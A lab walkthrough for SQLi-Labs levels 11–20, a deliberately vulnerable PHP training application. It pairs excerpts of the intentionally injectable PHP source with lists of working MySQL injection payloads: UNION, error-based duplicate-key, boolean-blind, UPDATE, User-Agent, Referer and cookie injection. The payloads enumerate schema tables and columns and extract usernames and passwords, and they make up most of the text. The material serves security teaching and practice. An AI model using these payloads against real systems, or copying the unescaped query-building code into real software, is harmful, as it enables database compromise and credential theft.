SQLi-Labs Less 11-20

SQLi-Labs Less 11-20

Less-11 POST - Error based - Single Quotes - String

Code:

// Less-11 (excerpt; the listing is truncated before the closing braces).
// Classic error-based string injection: both POST fields are interpolated into
// the SQL text with no escaping or parameterisation, so a single quote in
// uname/passwd ends the '...' literal -- hence the leading ' in the payloads
// below.  Intentionally vulnerable lab code; do not reuse.  (mysql_* is the
// legacy extension removed in PHP 7, so this lab assumes PHP 5.)
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        // String-built query; injection point is inside username='...'.
        $sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
        // $row is never assigned in this excerpt -- presumably the omitted lines
        // run mysql_query($sql) and mysql_fetch_array(); check the full Less-11 source.
        if($row)
        {
                // Success branch echoes the matched row: this is what the UNION
                // payloads ride on to read arbitrary data back.
                echo 'Your Login name:'. $row['username'];
                echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                // Raw MySQL error text is sent to the client -- the "error based" channel.
                print_r(mysql_error());

Code:

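-- Less-11 payloads (uname field).  Input sits inside username='...', so a bare ' closes the literal.
-- MySQL only treats "--" as a comment when it is followed by whitespace: the trailing space after
-- every "--" below is significant (the first line of the original list had lost it and would have
-- produced a syntax error).  "#" is a more robust terminator when typing into the HTML form.
-- 0x7365637572697479 = 'security' (the database), 0x7573657273 = 'users'; hex literals avoid quotes.
' or 1=1 -- 
' or 1=2 union select user(),database() -- 
' or 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 -- 
' or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 -- 
' or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 -- 
' or 1=2 union select username,password from security.users LIMIT 0,1 -- 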

Less-12 POST - Error based - Double Quotes - String - with twist

Code:

// Less-12 (excerpt; truncated before the closing braces).
// Same flow as Less-11, but each input is wrapped in double quotes and then placed
// inside parentheses, so the break-out prefix becomes ") instead of '.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        // Wrapping without escaping: a literal " in the input still ends the string.
        $uname='"'.$uname.'"';
        $passwd='"'.$passwd.'"';
        // Effective SQL: username=("<input>") and password=("<input>").
        // The leading @ only silences PHP notices on this assignment; it does nothing for the query.
        @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
        // $row comes from query code omitted here (presumably mysql_query/mysql_fetch_array).
        if($row)
        {
                // Matched row is echoed back -> UNION payloads can read data directly.
                echo 'Your Login name:'. $row['username'];
                echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                // Raw DB error reaches the client: the error-based channel.
                print_r(mysql_error());

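Code:

-- Less-12 payloads.  The app builds username=("<input>"), so ") closes the string and the paren.
-- The trailing space after "--" is required for MySQL to treat it as a comment (the first line of
-- the original list had lost it); "#" is a safer terminator when submitting through the form.
-- 0x7365637572697479 = 'security', 0x7573657273 = 'users'.
") or 1=1 -- 
") or 1=2 union select user(),database() -- 
") or 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 -- 
") or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 -- 
") or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 -- 
") or 1=2 union select username,password from security.users LIMIT 0,1 -- 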

Less-13 POST - Double injection - Single Quotes - String - with twist

Code:

// Less-13 (excerpt; truncated before the closing braces).
// Input is placed inside ('...'), so the break-out prefix is ').  Unlike Less-11/12 the
// success branch prints nothing, so a UNION cannot be used to read data back; the only
// output channel left is the MySQL error text (duplicate-key / "double query" technique).
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        // Effective SQL: username=('<input>') and password=('<input>'); no escaping.
        @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
        // $row is produced by query code omitted from this excerpt.
        if($row)
        {
                // All output on success is commented out -- nothing is echoed to the client.
                //echo " You Have successfully logged in " ;
                //echo 'Your Login name:'. $row['username'];
                //echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                // Errors are still printed, so data smuggled into an error message leaks.
                print_r(mysql_error());

Code:

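-- Less-13 payloads.  uname is wrapped as ('...'), so ') closes both the quote and the paren.
-- Nothing is echoed on success; data is carried out in the error text via the duplicate-key
-- trick: GROUP BY concat(floor(rand(0)*2), <data>) over information_schema.tables raises
-- "Duplicate entry '<0|1><data>' for key 'group_key'".  rand(0) is seeded and deterministic;
-- the original first line used unseeded rand(), which makes the collision (and so the leak)
-- hit-or-miss, so every line now uses rand(0).  The inner scalar subqueries use LIMIT n,1 so they
-- can never return more than one row.  0x7365637572697479 = 'security', 0x7573657273 = 'users',
-- 0x22 = '"' (separator).
-- NOTE(review): the UNION side has 1 column vs 2 in the outer query; whether MySQL evaluates the
-- derived table before rejecting the column-count mismatch is version dependent.  If it does not,
-- use the "') and (select 1 from (...)b) -- " form shown under Less-17 instead.
') or 1=1 -- 
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b -- 
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,1))a from information_schema.tables group by a)b -- 
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b -- 
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b -- 
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b -- 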

Less-14 POST - Double injection - Double Quotes - String - with twist

Code:

// Less-14 (excerpt; truncated before the closing braces).
// Input is wrapped in double quotes with no surrounding parentheses, so the break-out
// prefix is a bare ".  As in Less-13 the success branch prints nothing; only the
// error text is observable.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        // Quote wrapping without escaping -- a " in the input terminates the literal.
        $uname='"'.$uname.'"';
        $passwd='"'.$passwd.'"';
        // Effective SQL: username="<input>" and password="<input>".
        @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
        // $row is produced by query code omitted from this excerpt.
        if($row)
        {
                // No output on success.
                //echo " You Have successfully logged in " ;
                //echo 'Your Login name:'. $row['username'];
                //echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                // Error text still reaches the client (error-based channel).
                print_r(mysql_error());

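Code:

-- Less-14 payloads.  uname becomes "<input>", so a bare " closes the literal.
-- Same duplicate-key technique as Less-13.  The original first line used unseeded rand(), which is
-- nondeterministic and may not collide; all lines now use rand(0) so the error is reproducible.
-- Scalar subqueries use LIMIT n,1 so they never return more than one row.
-- 0x7365637572697479 = 'security', 0x7573657273 = 'users', 0x22 = '"'.
-- NOTE(review): 1-column UNION against a 2-column query -- see the Less-13 note; the
-- "\" and (select 1 from (...)b) -- " form is the portable alternative.
" or 1=1 -- 
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b -- 
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,1))a from information_schema.tables group by a)b -- 
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b -- 
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b -- 
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b -- 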

Less-15 POST - Blind - Boolean/time Based - Single Quotes

Code:

// Less-15 (excerpt; truncated before the closing braces).
// Blind variant of Less-11: the same single-quoted string injection, but neither the
// matched row nor the MySQL error is printed, so the attacker only sees whether the
// login "succeeded" (boolean channel) or how long the response took (time channel).
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        // Injection point inside username='...'; no escaping.
        @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
        // $row comes from query code omitted here.  For the boolean payloads to work the
        // two branches must still differ visibly (presumably done elsewhere in the page).
        if($row)
        {
                //echo " You Have successfully logged in " ;
                //echo 'Your Login name:'. $row['username'];
                //echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                // Error output disabled -> no error-based channel in this level.
                //print_r(mysql_error());

Code:

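-- Less-15 payloads (blind).  No data or error is echoed; the "' or <cond>" form makes the WHERE true
-- for every row when <cond> holds (first user is returned -> login succeeds) and false otherwise, so the
-- success/failure difference leaks one bit per request.  Expected ASCII values: 115='s' (security),
-- 117='u' (users / username), 112='p' (password), 68='D' (first user).  Iterate the substr offset
-- and compare value to read whole strings.  Scalar subqueries use LIMIT n,1: the original table-name
-- line used LIMIT 3,4, which returns more than one row on any schema with more than four tables and
-- then errors -- indistinguishable from "false" when errors are hidden.
' or 1=1 -- 
' or ascii(substr(database(),1,1))=115 -- 
' or (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,1),1,1))) = 117 -- 
' or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 -- 
' or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 -- 
' or (ascii(substr((select username from users limit 0,1),1,1))) = 68 -- 
' or (ascii(substr((select password from users limit 0,1),1,1))) = 68 -- 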

Less-16 POST - Blind - Boolean/time Based - Double Quotes

Code:

// Less-16 (excerpt; truncated before the closing braces).
// Blind variant of Less-12: input is wrapped in double quotes inside parentheses
// (break-out prefix ") and neither the row nor the error text is printed.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname=$_POST['uname'];
        $passwd=$_POST['passwd'];
        // Quote wrapping without escaping.
        $uname='"'.$uname.'"';
        $passwd='"'.$passwd.'"';
        // Effective SQL: username=("<input>") and password=("<input>").
        @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
        // $row comes from query code omitted here; the branches must differ visibly
        // elsewhere in the page for boolean payloads to work (not shown).
        if($row)
        {
                //echo " You Have successfully logged in " ;
                //echo 'Your Login name:'. $row['username'];
                //echo 'Your Password:' .$row['password'];
        }
        else
        {
                //echo "Try again looser";
                // Error output disabled -> blind only.
                //print_r(mysql_error());

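Code:

-- Less-16 payloads (blind).  The app builds username=("<input>"), so ") closes quote and paren.
-- Same one-bit-per-request boolean technique as Less-15; the "or" form returns the first user when the
-- condition holds and nothing otherwise.  ASCII: 115='s', 117='u', 112='p', 68='D'.
-- Scalar subqueries use LIMIT n,1 (the original table-name line used LIMIT 3,4, which errors on
-- schemas with more than four tables and then looks exactly like "false").
") or 1=1 -- 
") or ascii(substr(database(),1,1))=115 -- 
") or (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,1),1,1))) = 117 -- 
") or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 -- 
") or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 -- 
") or (ascii(substr((select username from users limit 0,1),1,1))) = 68 -- 
") or (ascii(substr((select password from users limit 0,1),1,1))) = 68 -- 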

Less-17 POST - Update Query - Error Based - String

Code:

';   
        $row1 = $row['username'];     
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
          echo "
";



        if (mysql_error())
        {
            echo '';
            print_r(mysql_error());
            echo "

"; echo "
"; } else { echo ''; //echo " You password has been successfully updated " ; echo " "; echo ""; } echo ''; //echo 'Your Password:' .$row['password']; echo ""; } else { echo ''; //echo "Bug off you Silly Dumb hacker"; echo "
"; echo ''; echo "
"; } } ?>

Code:

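-- Less-17: the injection point is the passwd field inside an UPDATE.  uname is looked up first
-- (not shown) and the matched username is re-used in the WHERE clause, so passwd must be the
-- injected parameter.  "--+" is used here because PHP form-decodes the POST body and turns "+"
-- into the space MySQL needs after "--".
-- CAUTION: this is a write.  If the injected expression evaluates without raising an error the
-- UPDATE actually runs and the target user's password is overwritten with the boolean result
-- ('' and (...) -> 0).  Only the duplicate-key error aborts it, so the error must be reliable:
-- the original first line used unseeded rand(), which does not always collide; every line now
-- uses rand(0).  Scalar subqueries use LIMIT n,1.
UPDATE users SET password = '$passwd' WHERE username='$row1'

' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,1))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b) --+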

Less-18 POST - Header Injection - Uagent field - Error based

Code:

';
            $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
            mysql_query($insert);
            //echo 'Your IP ADDRESS is: ' .$IP;
            echo "";
            //echo "
";
            echo '';           
            echo 'Your User Agent is: ' .$uagent;
            echo "";
            echo "
";
            print_r(mysql_error());           
            echo "

";
            echo '';
            echo "
";

            }
        else
            {
            echo '';
            //echo "Try again looser";
            print_r(mysql_error());
            echo "
"; echo "
"; echo ''; echo "
"; } } ?>

Code:

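-- Less-18: the User-Agent header is inserted unescaped as the first VALUES column (the login itself
-- must succeed with valid credentials for this branch to run).  Each payload closes the uagent
-- string, injects the error-raising subquery, then supplies the remaining two columns and the
-- closing paren itself so the statement stays well-formed.  "#" terminates the comment here rather
-- than "--+": header values are not form-decoded, so a "+" would stay a literal "+" and "--+" would
-- not be a comment.  The original first line used unseeded rand(); all lines now use rand(0) so the
-- duplicate-key error is deterministic.  Scalar subqueries use LIMIT n,1.  Note the payload is also
-- echoed back ("Your User Agent is:"), so the same field is a reflected-XSS sink.
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)

' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #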

Less-19 POST - Header Injection - Referer field - Error based

Code:

';
            $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
            mysql_query($insert);
            //echo 'Your IP ADDRESS is: ' .$IP;
            echo "";
            //echo "
";
            echo '';           
            echo 'Your Referer is: ' .$uagent;
            echo "";
            echo "
";
            print_r(mysql_error());           
            echo "

";
            echo '';
            echo "
";

            }
        else
            {
            echo '';
            //echo "Try again looser";
            print_r(mysql_error());
            echo "
"; echo "
"; echo ''; echo "
"; } } ?>

Code:

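-- Less-19: same as Less-18 but the Referer header is the sink (the listing above keeps the variable
-- name $uagent for it).  Only two columns this time, so the payload supplies one trailing value and
-- the closing paren.  "#" is used as terminator because headers are not form-decoded ("--+" would
-- keep a literal "+").  The original first line used unseeded rand(); every line now uses rand(0) so
-- the duplicate-key error is reproducible.  Scalar subqueries use LIMIT n,1.
INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')

' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,1))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b),'192.168.1.11') #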

Less-20 POST - Cookie Injection - uname cookie - Error based

Code:

 Welcome    Dhakkan 
"; echo "
"; echo "
"; echo ""; echo '
'; echo '
Username :    '; echo '
'; echo '
Password :      '; echo '

'; echo '
'; echo '
'; echo '
'; echo '
'; echo '
'; echo ''; echo '
'; echo ''; echo '
'; function check_input($value) { if(!empty($value)) { $value = substr($value,0,20); // truncation (see comments) } if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled { $value = stripslashes($value); } if (!ctype_digit($value)) // Quote if not a number { $value = "'" . mysql_real_escape_string($value) . "'"; } else { $value = intval($value); } return $value; } echo " "; echo " "; if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); $cookee = $row1['username']; if($row1) { echo ''; setcookie('uname', $cookee, time()+3600); header ('Location: index.php'); echo "I LOVE YOU COOKIES"; echo ""; echo ''; //echo 'Your Cookie is: ' .$cookee; echo ""; echo " "; print_r(mysql_error()); echo " "; echo ''; echo " "; } else { echo ''; //echo "Try again looser"; print_r(mysql_error()); echo "
"; echo "
"; echo ''; echo "
"; } } echo "
"; echo ''; echo '
'; } else { if(!isset($_POST['submit'])) { $cookee = $_COOKIE['uname']; $format = 'D d M Y - H:i:s'; $timestamp = time() + 3600; echo "
"; echo ' '; echo ''; echo " "; echo ' '; echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT']; echo " "; echo ''; echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR']; echo " "; echo ''; echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE "; echo ''; echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp); echo " "; $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1"; $result=mysql_query($sql); if (!$result) { die('Issue with your mysql: ' . mysql_error()); } $row = mysql_fetch_array($result); if($row) { echo ''; echo 'Your Login name:'. $row['username']; echo " "; echo ''; echo 'Your Password:' .$row['password']; echo ""; echo " "; echo 'Your ID:' .$row['id']; } else { echo "
"; echo ' '; echo ''; echo " "; //echo ''; } echo '
'; echo '
'; echo ''; echo '
'; echo '
'; } else { echo '
'; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo ''; echo " Your Cookie is deleted"; setcookie('uname', $row1['username'], time()-3600); header ('Location: index.php'); echo '

'; } echo " "; echo " "; //header ('Location: main.php'); echo " "; echo " "; //echo '
'; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'Cookie:'.$cookee."\n"); fclose($fp); } ?>

Code:

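-- Less-20 payloads (uname cookie).  The login form runs the input through check_input(), but the
-- cookie path (plain GET with the cookie set, no POST) builds
-- SELECT * FROM users WHERE username='$cookee' LIMIT 0,1 from the raw cookie value.  Errors are
-- printed there (die('Issue with your mysql: ...')), so error-based payloads also work.
-- The original list used "' and <cond>": with username='' matching no row the result is empty
-- whether <cond> is true or not, so no bit leaks.  "' or <cond>" (as in Less-15) returns the first
-- user when <cond> holds and nothing otherwise; alternatively prefix a known username:
-- <valid_user>' and <cond> -- .  ASCII: 115='s', 117='u', 112='p', 68='D'.  Scalar subqueries
-- use LIMIT n,1.  The trailing space after "--" is required.
' or 1=1 -- 
' or ascii(substr(database(),1,1))=115 -- 
' or (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,1),1,1))) = 117 -- 
' or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 -- 
' or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 -- 
' or (ascii(substr((select username from users limit 0,1),1,1))) = 68 -- 
' or (ascii(substr((select password from users limit 0,1),1,1))) = 68 -- 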
